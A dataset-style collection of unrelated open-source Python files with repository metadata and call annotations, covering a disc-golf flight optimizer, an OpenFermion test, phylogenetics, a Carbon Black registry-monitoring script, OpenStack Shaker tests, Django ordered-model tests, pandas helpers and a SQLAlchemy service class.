a, nose_up, hyzer = x
d = Disc(model, {"vx": math.cos(a * math.pi / 180) * v, "dgamma": rot, "vz": math.sin(a * math.pi / 180) * v,
"nose_up": nose_up, "hyzer": hyzer})
r = d.compute_trajectory(15.0, **{"max_step": .2})
rx = r.x[-1]
ry = abs(r.y[-1])
overCelingIndex = next(filter(lambda i: r.z[i] > ceiling, range(len(r.z))), None)
if overCelingIndex is not None:
return -r.x[overCelingIndex]
outsideTunnelIndex = next(filter(lambda i: math.fabs(r.y[i]) > tunnel_width / 2, range(len(r.z))), None)
if outsideTunnelIndex is not None:
return -r.x[outsideTunnelIndex]
return -rx + ry / (rx + ry)
bnds = [(-90, 90)] * 3
x0 = [6, -3, 10]
res = minimize(distance, x0, method='powell', bounds=bnds, options={'xtol': 1e-8, 'disp': True})
pprint(res)
a, nose_up, hyzer = res.x
disc = Disc(model, {"vx": math.cos(a * math.pi / 180) * v, "dgamma": rot, "vz": math.sin(a * math.pi / 180) * v,
"nose_up": nose_up, "hyzer": hyzer})
result = disc.compute_trajectory(15.0, **{"max_step": .2})
times = result.times
t, x, y, z = result.times, result.x, result.y, result.z
#plt.plot(x, y)
#plt.plot(x, z)
#plt.plot(t, x)
plt.plot(t, y)
plt.plot(t, z)
pprint(x[-1] * 3.28084) # feet
plt.show()
| [((39, 6, 39, 96), 'scipy.optimize.minimize', 'minimize', (), '', False, 'from scipy.optimize import minimize\n'), ((40, 0, 40, 11), 'pprint.pprint', 'pprint', ({(40, 7, 40, 10): 'res'}, {}), '(res)', False, 'from pprint import pprint\n'), ((53, 0, 53, 14), 'matplotlib.pyplot.plot', 'plt.plot', ({(53, 9, 53, 10): 't', (53, 12, 53, 13): 'y'}, {}), '(t, y)', True, 'import matplotlib.pyplot as plt\n'), ((54, 0, 54, 14), 'matplotlib.pyplot.plot', 'plt.plot', ({(54, 9, 54, 10): 't', (54, 12, 54, 13): 'z'}, {}), '(t, z)', True, 'import matplotlib.pyplot as plt\n'), ((56, 0, 56, 23), 'pprint.pprint', 'pprint', ({(56, 7, 56, 22): '(x[-1] * 3.28084)'}, {}), '(x[-1] * 3.28084)', False, 'from pprint import pprint\n'), ((58, 0, 58, 10), 'matplotlib.pyplot.show', 'plt.show', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((42, 26, 42, 53), 'math.cos', 'math.cos', ({(42, 35, 42, 52): 'a * math.pi / 180'}, {}), '(a * math.pi / 180)', False, 'import math\n'), ((42, 80, 42, 107), 'math.sin', 'math.sin', ({(42, 89, 42, 106): 'a * math.pi / 180'}, {}), '(a * math.pi / 180)', False, 'import math\n'), ((21, 27, 21, 54), 'math.cos', 'math.cos', ({(21, 36, 21, 53): 'a * math.pi / 180'}, {}), '(a * math.pi / 180)', False, 'import math\n'), ((21, 81, 21, 108), 'math.sin', 'math.sin', ({(21, 90, 21, 107): 'a * math.pi / 180'}, {}), '(a * math.pi / 180)', False, 'import math\n'), ((31, 47, 31, 64), 'math.fabs', 'math.fabs', ({(31, 57, 31, 63): 'r.y[i]'}, {}), '(r.y[i])', False, 'import math\n')] |
unpilbaek/OpenFermion-Cirq | openfermioncirq/variational/ansatzes/swap_network_trotter_hubbard_test.py | d2f5a871bb5aea1e53d280c0a0e4be999b0c8d9d | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from openfermioncirq.variational.ansatzes import SwapNetworkTrotterHubbardAnsatz
def test_swap_network_trotter_hubbard_ansatz_param_bounds():
ansatz = SwapNetworkTrotterHubbardAnsatz(3, 1, 1.0, 4.0, periodic=False)
assert list(symbol.name for symbol in ansatz.params()) == [
'Th_0', 'V_0',]
assert ansatz.param_bounds() == [
(-2.0, 2.0), (-1.0, 1.0)]
ansatz = SwapNetworkTrotterHubbardAnsatz(1, 4, 1.0, 4.0, periodic=False)
assert list(symbol.name for symbol in ansatz.params()) == [
'Tv_0', 'V_0',]
assert ansatz.param_bounds() == [
(-2.0, 2.0), (-1.0, 1.0)]
ansatz = SwapNetworkTrotterHubbardAnsatz(3, 2, 1.0, 4.0)
assert list(symbol.name for symbol in ansatz.params()) == [
'Th_0', 'Tv_0', 'V_0',]
assert ansatz.param_bounds() == [
(-2.0, 2.0), (-2.0, 2.0), (-1.0, 1.0)]
| [((18, 13, 18, 76), 'openfermioncirq.variational.ansatzes.SwapNetworkTrotterHubbardAnsatz', 'SwapNetworkTrotterHubbardAnsatz', (), '', False, 'from openfermioncirq.variational.ansatzes import SwapNetworkTrotterHubbardAnsatz\n'), ((24, 13, 24, 76), 'openfermioncirq.variational.ansatzes.SwapNetworkTrotterHubbardAnsatz', 'SwapNetworkTrotterHubbardAnsatz', (), '', False, 'from openfermioncirq.variational.ansatzes import SwapNetworkTrotterHubbardAnsatz\n'), ((30, 13, 30, 60), 'openfermioncirq.variational.ansatzes.SwapNetworkTrotterHubbardAnsatz', 'SwapNetworkTrotterHubbardAnsatz', ({(30, 45, 30, 46): '3', (30, 48, 30, 49): '2', (30, 51, 30, 54): '1.0', (30, 56, 30, 59): '4.0'}, {}), '(3, 2, 1.0, 4.0)', False, 'from openfermioncirq.variational.ansatzes import SwapNetworkTrotterHubbardAnsatz\n')] |
DaneshMoradigaravand/PlasmidPerm | Modules/Phylogenetic.py | 7a84c1d4dbf7320dd5ba821ff0e715a89fe4b3e4 | import os
from Bio import AlignIO, Phylo
from Bio.Phylo.TreeConstruction import DistanceCalculator, DistanceTreeConstructor
class Phylogenetic:
def __init__(self, PATH):
self.PATH=PATH
def binary_sequence_generator(self, input_kmer_pattern, label):
string_inp="".join([ 'A' if x==0 else 'C' for x in input_kmer_pattern])
return([">"+label,string_inp])
def multifasta_fille_generator(self, converted_sequences_phyolgenetic):
file_output = open(os.path.join(self.PATH,"binary_presence_absence_kmers.fasta"), "w")
file_output.writelines('\n'.join(converted_sequences_phyolgenetic) + '\n' )
file_output.close()
def distance_matrix_generator(self):
align = AlignIO.read(os.path.join(self.PATH,"binary_presence_absence_kmers.fasta"), "fasta")
calculator = DistanceCalculator('identity')
distMatrix = calculator.get_distance(align)
return(distMatrix)
def distance_tree_file_generator(self,distance_matrix):
constructor = DistanceTreeConstructor()
UPGMATree = constructor.upgma(distance_matrix)
Phylo.write(UPGMATree, os.path.join(self.PATH,"binary_presence_absence_kmers.tre") , "newick") | [((20, 21, 20, 51), 'Bio.Phylo.TreeConstruction.DistanceCalculator', 'DistanceCalculator', ({(20, 40, 20, 50): '"""identity"""'}, {}), "('identity')", False, 'from Bio.Phylo.TreeConstruction import DistanceCalculator, DistanceTreeConstructor\n'), ((25, 22, 25, 47), 'Bio.Phylo.TreeConstruction.DistanceTreeConstructor', 'DistanceTreeConstructor', ({}, {}), '()', False, 'from Bio.Phylo.TreeConstruction import DistanceCalculator, DistanceTreeConstructor\n'), ((14, 27, 14, 88), 'os.path.join', 'os.path.join', ({(14, 40, 14, 49): 'self.PATH', (14, 50, 14, 87): '"""binary_presence_absence_kmers.fasta"""'}, {}), "(self.PATH, 'binary_presence_absence_kmers.fasta')", False, 'import os\n'), ((19, 29, 19, 90), 'os.path.join', 'os.path.join', ({(19, 42, 19, 51): 'self.PATH', (19, 52, 19, 89): '"""binary_presence_absence_kmers.fasta"""'}, {}), "(self.PATH, 'binary_presence_absence_kmers.fasta')", False, 'import os\n'), ((27, 31, 27, 90), 'os.path.join', 'os.path.join', ({(27, 44, 27, 53): 'self.PATH', (27, 54, 27, 89): '"""binary_presence_absence_kmers.tre"""'}, {}), "(self.PATH, 'binary_presence_absence_kmers.tre')", False, 'import os\n')] |
cbcommunity/cbapi-examples | retrieve_regmod_values.py | f8a81006b27c724582b4b04c124eb97a8c8e75d3 | #!/usr/bin/env python
#
#The MIT License (MIT)
#
# Copyright (c) 2015 Bit9 + Carbon Black
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# -----------------------------------------------------------------------------
# Extension regmod watcher and grabber
#
# This script listens to the CB messaging bus for registry modification events,
# and when a modification is seen that matches a regular expression from a file
# of registry path regular expressions, it goes and grabs the registry value
# using CB Live Response.
#
# You need to make sure rabbitmq is enabled in cb.conf, and you might need to
# open a firewall rule for port 5004. You also will need to enable regmod
# in the DatastoreBroadcastEventTypes=<values> entry. If anything is changed
# here, you'll have to do service cb-enterprise restart.
#
# TODO: More error handling, more performance improvements
#
# last updated 2016-01-23 by Ben Johnson [email protected] ([email protected])
#
import re
import Queue
import sys
from threading import Thread
import time
import traceback
try:
from cbapi.legacy.util.cli_helpers import main_helper
from cbapi.legacy.util.composite_helpers import MessageSubscriberAndLiveResponseActor
import cbapi.legacy.util.sensor_events_pb2 as cpb
except ImportError:
from cbapi.util.cli_helpers import main_helper
from cbapi.util.composite_helpers import MessageSubscriberAndLiveResponseActor
import cbapi.util.sensor_events_pb2 as cpb
class RegistryModWatcherAndValueGrabber(MessageSubscriberAndLiveResponseActor):
"""
This class subscribes to messages from the CB messaging bus,
looking for regmod events. For each regmod event, it checks
to see if the the registry path matches one of our regexes.
If it does, it goes and grabs it.
"""
def __init__(self, cb_server_url, cb_ext_api, username, password, regmod_regexes, verbose):
self.regmod_regexes = regmod_regexes
self.verbose = verbose
MessageSubscriberAndLiveResponseActor.__init__(self,
cb_server_url,
cb_ext_api,
username,
password,
"ingress.event.regmod")
# Threading so that message queue arrives do not block waiting for live response
self.queue = Queue.Queue()
self.go = True
self.worker_thread = Thread(target=self._worker_thread_loop)
self.worker_thread.start()
def on_stop(self):
self.go = False
self.worker_thread.join(timeout=2)
MessageSubscriberAndLiveResponseActor.on_stop(self)
def consume_message(self, channel, method_frame, header_frame, body):
if "application/protobuf" != header_frame.content_type:
return
try:
# NOTE -- this is not very efficient in PYTHON, and should
# use a C parser to make this much, much faster.
# http://yz.mit.edu/wp/fast-native-c-protocol-buffers-from-python/
x = cpb.CbEventMsg()
x.ParseFromString(body)
if not x.regmod or x.regmod.action != 2:
# Check for MODIFICATION event because we will usually get
# a creation event and a modification event, and might as
# well go with the one that says data has actually been written.
return
regmod_path = None
if x.regmod.utf8_regpath:
if self.verbose:
print "Event arrived: |%s|" % x.regmod.utf8_regpath
for regmod_regex in self.regmod_regexes:
if regmod_regex.match(x.regmod.utf8_regpath):
regmod_path = x.regmod.utf8_regpath
break
if regmod_path:
regmod_path = regmod_path.replace("\\registry\\machine\\", "HKLM\\")
regmod_path = regmod_path.replace("\\registry\\user\\", "HKEY_USERS\\")
regmod_path = regmod_path.strip()
# TODO -- more cleanup here potentially?
self.queue.put((x, regmod_path))
except:
traceback.print_exc()
def _worker_thread_loop(self):
while self.go:
try:
try:
(x, regmod_path) = self.queue.get(timeout=0.5)
except Queue.Empty:
continue
# TODO -- could comment this out if you want CSV data to feed into something
print "--> Attempting for %s" % regmod_path
# Go Grab it if we think we have something!
sensor_id = x.env.endpoint.SensorId
hostname = x.env.endpoint.SensorHostName
# TODO -- this could use some concurrency and work queues because we could wait a while for
# each of these to get established and retrieve the value
# Establish our CBLR session if necessary!
lrh = self._create_lr_session_if_necessary(sensor_id)
data = lrh.get_registry_value(regmod_path)
print "%s,%s,%d,%s,%s,%s" % ( time.asctime(),
hostname,
sensor_id,
x.header.process_path,
regmod_path,
data.get('value_data', "") if data else "<UNKNOWN>")
# TODO -- could *do something* here, like if it is for autoruns keys then go check the signature status
# of the binary at the path pointed to, and see who wrote it out, etc
except:
traceback.print_exc()
def main(cb, args):
username = args.get("username")
password = args.get("password")
regpaths_file = args.get("regpaths_file")
verbose = args.get("verbose", False)
if verbose:
# maybe you want to print out all the regpaths we're using?
print "Regpaths file:", regpaths_file
f = file(regpaths_file, 'rb')
regpaths_data = f.read()
f.close()
regmod_regexes = []
for line in regpaths_data.split('\n'):
line = line.strip()
if len(line) == 0:
continue
regmod_regexes.append(re.compile(line))
listener = RegistryModWatcherAndValueGrabber(args.get('server_url'), cb, username, password, regmod_regexes, verbose)
try:
if verbose:
print "Registry Mod Watcher and Grabber -- started. Watching for:", regpaths_data
else:
print "Registry Mod Watcher and Grabber -- started. Watching for %d regexes" % len(regmod_regexes)
listener.process()
except KeyboardInterrupt:
print >> sys.stderr, "Caught Ctrl-C"
listener.stop()
print "Registry Mod Watcher and Grabber -- stopped."
if __name__ == "__main__":
## YOU CAN USE data/autoruns_regexes.txt to test ##
required_args =[("-i", "--username", "store", None, "username", "CB messaging username"),
("-p", "--password", "store", None, "password", "CB messaging password"),
("-r", "--regpaths_file", "store", None, "regpaths_file", "File of newline delimited regexes for regpaths")]
optional_args = [("-v", "--verbose", "store_true", False, "verbose", "Enable verbose output")]
main_helper("Subscribe to message bus events and for each registry modification that matches one of our supplied regexes, go retrieve value.",
main,
custom_required=required_args,
custom_optional=optional_args)
| [] |
ssin122/test-h | h/exceptions.py | c10062ae23b690afaac0ab4af7b9a5a5e4b686a9 | # -*- coding: utf-8 -*-
"""Exceptions raised by the h application."""
from __future__ import unicode_literals
from h.i18n import TranslationString as _
# N.B. This class **only** covers exceptions thrown by API code provided by
# the h package. memex code has its own base APIError class.
class APIError(Exception):
"""Base exception for problems handling API requests."""
def __init__(self, message, status_code=500):
self.status_code = status_code
super(APIError, self).__init__(message)
class ClientUnauthorized(APIError):
"""
Exception raised if the client credentials provided for an API request
were missing or invalid.
"""
def __init__(self):
message = _('Client credentials are invalid.')
super(ClientUnauthorized, self).__init__(message, status_code=403)
class OAuthTokenError(APIError):
"""
Exception raised when an OAuth token request failed.
This specifically handles OAuth errors which have a type (``message``) and
a description (``description``).
"""
def __init__(self, message, type_, status_code=400):
self.type = type_
super(OAuthTokenError, self).__init__(message, status_code=status_code)
| [((29, 18, 29, 54), 'h.i18n.TranslationString', '_', ({(29, 20, 29, 53): '"""Client credentials are invalid."""'}, {}), "('Client credentials are invalid.')", True, 'from h.i18n import TranslationString as _\n')] |
opnfv-poc/functest | functest/opnfv_tests/openstack/shaker/shaker.py | 4f54b282cabccef2a53e21c77c81b60fe890a8a4 | #!/usr/bin/env python
# Copyright (c) 2018 Orange and others.
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Apache License, Version 2.0
# which accompanies this distribution, and is available at
# http://www.apache.org/licenses/LICENSE-2.0
"""
Shaker_ wraps around popular system network testing tools like iperf, iperf3
and netperf (with help of flent). Shaker is able to deploy OpenStack instances
and networks in different topologies. Shaker scenario specifies the deployment
and list of tests to execute.
.. _Shaker: http://pyshaker.readthedocs.io/en/latest/
"""
import logging
import os
import json
import scp
from functest.core import singlevm
from functest.utils import env
class Shaker(singlevm.SingleVm2):
"""Run shaker full+perf l2 and l3"""
# pylint: disable=too-many-instance-attributes
__logger = logging.getLogger(__name__)
filename = '/home/opnfv/functest/images/shaker-image-1.3.0+stretch.qcow2'
flavor_ram = 512
flavor_vcpus = 1
flavor_disk = 3
username = 'debian'
port = 9000
ssh_connect_loops = 12
create_server_timeout = 300
shaker_timeout = '3600'
quota_instances = -1
quota_cores = -1
def __init__(self, **kwargs):
super(Shaker, self).__init__(**kwargs)
self.role = None
def check_requirements(self):
if self.count_hypervisors() < 2:
self.__logger.warning("Shaker requires at least 2 hypervisors")
self.is_skipped = True
self.project.clean()
def prepare(self):
super(Shaker, self).prepare()
self.cloud.create_security_group_rule(
self.sec.id, port_range_min=self.port, port_range_max=self.port,
protocol='tcp', direction='ingress')
def execute(self):
"""
Returns:
- 0 if success
- 1 on operation error
"""
assert self.ssh
endpoint = self.get_public_auth_url(self.orig_cloud)
self.__logger.debug("keystone endpoint: %s", endpoint)
if self.orig_cloud.get_role("admin"):
role_name = "admin"
elif self.orig_cloud.get_role("Admin"):
role_name = "Admin"
else:
raise Exception("Cannot detect neither admin nor Admin")
self.orig_cloud.grant_role(
role_name, user=self.project.user.id,
project=self.project.project.id,
domain=self.project.domain.id)
if not self.orig_cloud.get_role("heat_stack_owner"):
self.role = self.orig_cloud.create_role("heat_stack_owner")
self.orig_cloud.grant_role(
"heat_stack_owner", user=self.project.user.id,
project=self.project.project.id,
domain=self.project.domain.id)
self.orig_cloud.set_compute_quotas(
self.project.project.name,
instances=self.quota_instances,
cores=self.quota_cores)
scpc = scp.SCPClient(self.ssh.get_transport())
scpc.put('/home/opnfv/functest/conf/env_file', remote_path='~/')
if os.environ.get('OS_CACERT'):
scpc.put(os.environ.get('OS_CACERT'), remote_path='~/os_cacert')
(_, stdout, stderr) = self.ssh.exec_command(
'source ~/env_file && '
'export OS_INTERFACE=public && '
'export OS_AUTH_URL={} && '
'export OS_USERNAME={} && '
'export OS_PROJECT_NAME={} && '
'export OS_PROJECT_ID={} && '
'unset OS_TENANT_NAME && '
'unset OS_TENANT_ID && '
'unset OS_ENDPOINT_TYPE && '
'export OS_PASSWORD="{}" && '
'{}'
'env && '
'timeout {} shaker --debug --image-name {} --flavor-name {} '
'--server-endpoint {}:9000 --external-net {} --dns-nameservers {} '
'--scenario openstack/full_l2,'
'openstack/full_l3_east_west,'
'openstack/full_l3_north_south,'
'openstack/perf_l3_north_south '
'--report report.html --output report.json'.format(
endpoint, self.project.user.name, self.project.project.name,
self.project.project.id, self.project.password,
'export OS_CACERT=~/os_cacert && ' if os.environ.get(
'OS_CACERT') else '',
self.shaker_timeout, self.image.name, self.flavor.name,
self.fip.floating_ip_address, self.ext_net.id,
env.get('NAMESERVER')))
self.__logger.info("output:\n%s", stdout.read().decode("utf-8"))
self.__logger.info("error:\n%s", stderr.read().decode("utf-8"))
if not os.path.exists(self.res_dir):
os.makedirs(self.res_dir)
try:
scpc.get('report.json', self.res_dir)
scpc.get('report.html', self.res_dir)
except scp.SCPException:
self.__logger.exception("cannot get report files")
return 1
with open(os.path.join(self.res_dir, 'report.json')) as json_file:
data = json.load(json_file)
for value in data["records"].values():
if value["status"] != "ok":
self.__logger.error(
"%s failed\n%s", value["scenario"], value["stderr"])
return 1
return stdout.channel.recv_exit_status()
def clean(self):
super(Shaker, self).clean()
if self.role:
self.orig_cloud.delete_role(self.role.id)
| [((33, 15, 33, 42), 'logging.getLogger', 'logging.getLogger', ({(33, 33, 33, 41): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((94, 11, 94, 38), 'os.environ.get', 'os.environ.get', ({(94, 26, 94, 37): '"""OS_CACERT"""'}, {}), "('OS_CACERT')", False, 'import os\n'), ((125, 15, 125, 43), 'os.path.exists', 'os.path.exists', ({(125, 30, 125, 42): 'self.res_dir'}, {}), '(self.res_dir)', False, 'import os\n'), ((126, 12, 126, 37), 'os.makedirs', 'os.makedirs', ({(126, 24, 126, 36): 'self.res_dir'}, {}), '(self.res_dir)', False, 'import os\n'), ((134, 19, 134, 39), 'json.load', 'json.load', ({(134, 29, 134, 38): 'json_file'}, {}), '(json_file)', False, 'import json\n'), ((95, 21, 95, 48), 'os.environ.get', 'os.environ.get', ({(95, 36, 95, 47): '"""OS_CACERT"""'}, {}), "('OS_CACERT')", False, 'import os\n'), ((122, 16, 122, 37), 'functest.utils.env.get', 'env.get', ({(122, 24, 122, 36): '"""NAMESERVER"""'}, {}), "('NAMESERVER')", False, 'from functest.utils import env\n'), ((133, 18, 133, 59), 'os.path.join', 'os.path.join', ({(133, 31, 133, 43): 'self.res_dir', (133, 45, 133, 58): '"""report.json"""'}, {}), "(self.res_dir, 'report.json')", False, 'import os\n'), ((118, 54, 119, 32), 'os.environ.get', 'os.environ.get', ({(119, 20, 119, 31): '"""OS_CACERT"""'}, {}), "('OS_CACERT')", False, 'import os\n')] |
hongrui16/naic2020_B | lib/models/bn_helper.py | 9321bdd19e7d2d47ac9c711eb8437cd364e25f44 | import torch
import functools
if torch.__version__.startswith('0'):
from .sync_bn.inplace_abn.bn import InPlaceABNSync
BatchNorm2d = functools.partial(InPlaceABNSync, activation='none')
BatchNorm2d_class = InPlaceABNSync
relu_inplace = False
else:
# BatchNorm2d_class = BatchNorm2d = torch.nn.SyncBatchNorm
BatchNorm2d_class = BatchNorm2d = torch.nn.BatchNorm2d
relu_inplace = True | [((4, 3, 4, 36), 'torch.__version__.startswith', 'torch.__version__.startswith', ({(4, 32, 4, 35): '"""0"""'}, {}), "('0')", False, 'import torch\n'), ((6, 18, 6, 70), 'functools.partial', 'functools.partial', (), '', False, 'import functools\n')] |
HiddenClever/django-ordered-model | ordered_model/tests/models.py | c94709403cfbb35fa4da3d6470ead816096fdec8 | from django.db import models
from ordered_model.models import OrderedModel, OrderedModelBase
class Item(OrderedModel):
name = models.CharField(max_length=100)
class Question(models.Model):
pass
class TestUser(models.Model):
pass
class Answer(OrderedModel):
question = models.ForeignKey(Question, on_delete=models.CASCADE, related_name='answers')
user = models.ForeignKey(TestUser, on_delete=models.CASCADE, related_name='answers')
order_with_respect_to = ('question', 'user')
class Meta:
ordering = ('question', 'user', 'order')
def __unicode__(self):
return u"Answer #{0:d} of question #{1:d} for user #{2:d}".format(self.order, self.question_id, self.user_id)
class CustomItem(OrderedModel):
id = models.CharField(max_length=100, primary_key=True)
name = models.CharField(max_length=100)
modified = models.DateTimeField(null=True, blank=True)
class CustomOrderFieldModel(OrderedModelBase):
sort_order = models.PositiveIntegerField(editable=False, db_index=True)
name = models.CharField(max_length=100)
order_field_name = 'sort_order'
class Meta:
ordering = ('sort_order',)
class Topping(models.Model):
name = models.CharField(max_length=100)
class Pizza(models.Model):
name = models.CharField(max_length=100)
toppings = models.ManyToManyField(Topping, through='PizzaToppingsThroughModel')
class PizzaToppingsThroughModel(OrderedModel):
pizza = models.ForeignKey(Pizza, on_delete=models.CASCADE)
topping = models.ForeignKey(Topping, on_delete=models.CASCADE)
order_with_respect_to = 'pizza'
class Meta:
ordering = ('pizza', 'order')
class BaseQuestion(OrderedModel):
order_class_path = __module__ + '.BaseQuestion'
question = models.TextField(max_length=100)
class Meta:
ordering = ('order',)
class MultipleChoiceQuestion(BaseQuestion):
good_answer = models.TextField(max_length=100)
wrong_answer1 = models.TextField(max_length=100)
wrong_answer2 = models.TextField(max_length=100)
wrong_answer3 = models.TextField(max_length=100)
class OpenQuestion(BaseQuestion):
answer = models.TextField(max_length=100)
| [((6, 11, 6, 43), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((18, 15, 18, 92), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import models\n'), ((19, 11, 19, 88), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import models\n'), ((30, 9, 30, 59), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((31, 11, 31, 43), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((32, 15, 32, 58), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import models\n'), ((36, 17, 36, 75), 'django.db.models.PositiveIntegerField', 'models.PositiveIntegerField', (), '', False, 'from django.db import models\n'), ((37, 11, 37, 43), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((45, 11, 45, 43), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((49, 11, 49, 43), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((50, 15, 50, 83), 'django.db.models.ManyToManyField', 'models.ManyToManyField', (), '', False, 'from django.db import models\n'), ((54, 12, 54, 62), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import models\n'), ((55, 14, 55, 66), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import models\n'), ((63, 15, 63, 47), 'django.db.models.TextField', 'models.TextField', (), '', False, 'from django.db import models\n'), ((68, 18, 68, 50), 'django.db.models.TextField', 'models.TextField', (), '', False, 'from django.db import models\n'), ((69, 20, 69, 52), 'django.db.models.TextField', 'models.TextField', (), '', False, 'from django.db import models\n'), ((70, 20, 70, 52), 'django.db.models.TextField', 'models.TextField', (), '', False, 'from django.db import models\n'), ((71, 20, 71, 52), 'django.db.models.TextField', 'models.TextField', (), '', False, 'from django.db import models\n'), ((74, 13, 74, 45), 'django.db.models.TextField', 'models.TextField', (), '', False, 'from django.db import models\n')] |
SACGF/variantgrid | library/pandas_utils.py | 515195e2f03a0da3a3e5f2919d8e0431babfd9c9 | import os
import sys
import numpy as np
import pandas as pd
def get_columns_percent_dataframe(df: pd.DataFrame, totals_column=None, percent_names=True) -> pd.DataFrame:
""" @param totals_column: (default = use sum of columns)
@param percent_names: Rename names from 'col' => 'col %'
Return a dataframe as a percentage of totals_column if provided, or sum of columns """
percent_df = pd.DataFrame(index=df.index)
columns = df.columns
if totals_column:
totals_series = df[totals_column]
columns = columns - [totals_column]
else:
totals_series = df.sum(axis=1)
for col in columns:
new_col = col
if percent_names:
new_col = f"{new_col} %"
multiplier = 100.0 # to get percent
percent_df[new_col] = multiplier * df[col] / totals_series
return percent_df
def get_rows_percent_dataframe(df: pd.DataFrame) -> pd.DataFrame:
""" Return a dataframe as a percentage of sum of rows """
row_sums = df.sum(axis=0)
return df.multiply(100.0) / row_sums
def get_total_percent_dataframe(df: pd.DataFrame) -> pd.DataFrame:
""" Return a dataframe as a percentage of sum of rows """
total = df.sum(axis=0).sum()
return df.multiply(100.0) / total
def df_handle_below_minimum_floats(df: pd.DataFrame) -> pd.DataFrame:
def handle_if_below_min(series):
if series.dtype == 'd':
too_small_mask = abs(series) < sys.float_info.min
series[too_small_mask] = sys.float_info.min
return series
return df.apply(handle_if_below_min, axis=0)
def nan_to_none(val):
if np.isnan(val):
val = None
return val
def df_nan_to_none(df: pd.DataFrame) -> pd.DataFrame:
return df.where((pd.notnull(df)), None)
def df_replace_nan(df: pd.DataFrame, nan_replace='') -> pd.DataFrame:
return df.where((pd.notnull(df)), nan_replace)
def read_csv_skip_header(fle, header='#', **kwargs) -> pd.DataFrame:
if os.stat(fle).st_size == 0:
raise ValueError("File is empty")
with open(fle) as f:
pos = 0
cur_line = f.readline()
while cur_line.startswith(header):
pos = f.tell()
cur_line = f.readline()
f.seek(pos)
return pd.read_csv(f, **kwargs)
| [((13, 17, 13, 45), 'pandas.DataFrame', 'pd.DataFrame', (), '', True, 'import pandas as pd\n'), ((56, 7, 56, 20), 'numpy.isnan', 'np.isnan', ({(56, 16, 56, 19): 'val'}, {}), '(val)', True, 'import numpy as np\n'), ((62, 21, 62, 35), 'pandas.notnull', 'pd.notnull', ({(62, 32, 62, 34): 'df'}, {}), '(df)', True, 'import pandas as pd\n'), ((66, 21, 66, 35), 'pandas.notnull', 'pd.notnull', ({(66, 32, 66, 34): 'df'}, {}), '(df)', True, 'import pandas as pd\n'), ((79, 15, 79, 39), 'pandas.read_csv', 'pd.read_csv', ({(79, 27, 79, 28): 'f'}, {}), '(f, **kwargs)', True, 'import pandas as pd\n'), ((70, 7, 70, 19), 'os.stat', 'os.stat', ({(70, 15, 70, 18): 'fle'}, {}), '(fle)', False, 'import os\n')] |
grace1307/lan_mapper | app/services/base.py | 5d244078732b86a2e38a5b21436ffca83c689eeb | from app.db import db
# Ignore it if db can't find the row when updating/deleting
# Todo: not ignore it, raise some error, remove checkers in view
class BaseService:
__abstract__ = True
model = None
# Create
def add_one(self, **kwargs):
new_row = self.model(**kwargs)
db.session.add(new_row)
db.session.commit() # sqlalchemy auto flushes so maybe this just need commit ?
return new_row
# Read
def select_one(self, id):
return self.model.query.filter(self.model.id == id).one_or_none()
def select_all(self, conditions: list = None, sort_by=None, is_asc=None):
query = db.session.query(self.model)
if conditions is not None:
for condition in conditions:
query = query.filter(condition)
if sort_by is not None and is_asc is not None:
sort_column = self.model.__table__._columns[sort_by]
is_asc = is_asc == 'true'
if sort_column is not None:
query = query.order_by(sort_column.asc() if is_asc else sort_column.desc())
return query.all()
# Update
def update_one(self, id, updated):
row = self.model.query.filter(self.model.id == id)
row_result = row.one_or_none()
if row_result is not None:
row.update(updated)
db.session.commit()
return row.one_or_none()
# Delete
def delete_one(self, id):
row = self.select_one(id)
if row is not None:
db.session.delete(row)
db.session.commit()
